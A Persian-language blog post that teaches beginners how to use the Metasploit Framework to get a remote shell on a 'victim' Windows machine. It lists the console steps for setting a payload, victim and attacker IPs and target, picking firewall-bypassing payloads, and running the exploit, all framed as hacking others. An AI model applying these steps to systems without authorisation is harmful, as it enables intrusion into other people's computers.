شل گرفتن با برنامه : Metasploit Framework


بعد از دانلود و نصب در شاخه Program files به بخش Metasploit Framework

وارد شده و گزينه MSFConsol را برای شروع کليک کنيد .

توجه : برای دريافت باگهای جديد و پچ نشده از همان بخش گزينه MSFUpdate

را انتخاب کنيد

حالا به همان قسمت MSFConsol رفته و کار را شروع ميکنيم :

پارامترهايی که برای شروع هک نياز داريم به ترتيب :

show PAYLOADS  : در اينجا روشهای مختلفی برای اتصال در نظر گرفته

شده که با اين دستور آنها نمايش داده ميشوند مثال : اگر در سيستم

قربانی نرم افزار ضد هک ( Fire wall ) قرار داده شده باشد گزينه مرتبط با

عبور از فاير وال را انتخاب ميکنيم .

و با تایپ کلمه  نام پی لود set PAYLOAD   آنرا برای برنامه تعريف ميکنيم

توجه داشته باشيد که بين ۳ کلمه فاصله است و بايد PAYLOAD با حروف

بزرگ باشد

و به جای کلمه نام پی لود در بالا پی لود مورد نظر را مينويسيم

RHOST : آی پی قربانی

دستور set RHOST ۹۹۹.۸۸۸.۷۷۷.۶۶۶   برای تعريف کردن آی پی قربانی به کار ميرود

LHOST : آی پی شما

دستور set LHOST ۵۵۵.۴۴۴.۳۳۳.۲۲۲   برای تعريف کردن آی پی شما به کار ميرود

شايد اين سوال پيش بياد که آی پی ما در هک چه نقشی دارد : برای اتصال

سيستم قربانی به آی پی شما و در نتيجه وصل شدن کامپيوتر شما به قربانی .

show TARGETS : با تایپ اين کلمه شما تمام ويندوزهای آسيب پذيری که توسط

اين روش قابل هک هستند را خواهيد ديد و شما بايد شماره ويندوزی که تصميم

به نفوذ به آن را داريد در مقابل کلمه روبرو تایپ کنيد ————->

set TARGET 0    ( معمولا 0 را برای انتخاب تمام گزينه ها وارد ميکنيم )

 

show OPTIONS : با وارد کردن اين کلمه ليستی به ما داده ميشود که

متغير هايی که بايد توسط ما در برنامه تعريف شوند قرار دارد مثل

آی پی قربانی / آی پی ما و نوع پی لود که در بالا توضيح داده شد . اگر

گزينه ای در اين فهرست بدون مقدار بود بايد به آن مقدار دهيم که در هر

اکسپلويت يک مقدار اختصاصی وجود دارد و بعد از مدتی کار با اين برنامه

تمام اين موارد را ياد خواهيد گرفت .

exploit : با تایپ اين کلمه  Shell گرفتن از سيستم قربانی آغاز ميشود و از

اينجا به بعد مربوط به نفوذ پذيری سيستم قربانی است که در صورت نفوذ

کارهای بسياری ميتوان انجام داد که در صورت عدم آشنايی با دستورات CMD

بايد اول با آنها آشنا شويد چون بدون آشنايی با اين دستورات هک با اين نرم افزار

در حقيقت بی معنی است

 

نویسنده :جواد مظفری

 

diedloves@Yahoo.com

 

http://www.Asiaweb.co.sr

 

http://www.hackerz.ir

 

این نوشتار مشمول قوانین احسیرسافت می شود .(بند 2)


 

  1. هنوز دیدگاهی داده نشده است.
  1. No trackbacks yet.

پاسخی بگذارید

در پایین مشخصات خود را پر کنید یا برای ورود روی شمایل‌ها کلیک نمایید:

نشان‌وارهٔ وردپرس.کام

شما در حال بیان دیدگاه با حساب کاربری WordPress.com خود هستید. بیرون رفتن / تغییر دادن )

تصویر توییتر

شما در حال بیان دیدگاه با حساب کاربری Twitter خود هستید. بیرون رفتن / تغییر دادن )

عکس فیسبوک

شما در حال بیان دیدگاه با حساب کاربری Facebook خود هستید. بیرون رفتن / تغییر دادن )

عکس گوگل+

شما در حال بیان دیدگاه با حساب کاربری Google+ خود هستید. بیرون رفتن / تغییر دادن )

درحال اتصال به %s

%d وب‌نوشت‌نویس این را دوست دارند: